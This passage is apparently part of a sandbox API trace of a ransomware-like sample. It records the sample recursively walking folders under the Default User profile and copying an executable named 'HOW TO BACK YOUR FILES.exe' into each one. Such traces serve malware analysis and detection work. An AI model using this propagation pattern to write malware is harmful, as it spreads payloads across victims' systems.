Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.700] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.700] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.701] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.701] GetLastError () returned 0x0 [0042.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.701] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.701] CloseHandle (hObject=0x118) returned 1 [0042.701] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.701] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.702] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.702] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.702] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.702] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.702] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.702] GetLastError () returned 0x0 [0042.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.702] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.702] CloseHandle (hObject=0x118) returned 1 [0042.703] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.703] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.703] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.703] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.703] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.703] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.704] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.704] GetLastError () returned 0x0 [0042.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.704] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.704] CloseHandle (hObject=0x118) returned 1 [0042.704] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.704] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.704] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.704] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.704] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.705] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.705] GetLastError () returned 0x0 [0042.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.705] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.705] CloseHandle (hObject=0x118) returned 1 [0042.705] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.705] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.705] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.706] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.706] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.706] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.706] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.706] GetLastError () returned 0x0 [0042.706] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.706] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.706] CloseHandle (hObject=0x118) returned 1 [0042.707] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.707] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.707] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.707] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.707] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.708] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.708] GetLastError () returned 0x0 [0042.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.708] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.708] CloseHandle (hObject=0x118) returned 1 [0042.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.708] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.708] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.708] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.708] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.709] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.709] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.709] GetLastError () returned 0x0 [0042.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.709] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.709] CloseHandle (hObject=0x118) returned 1 [0042.709] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.709] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.710] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.710] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.710] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.710] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.710] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.710] GetLastError () returned 0x0 [0042.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.710] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.711] CloseHandle (hObject=0x118) returned 1 [0042.711] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.711] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.711] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.711] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application 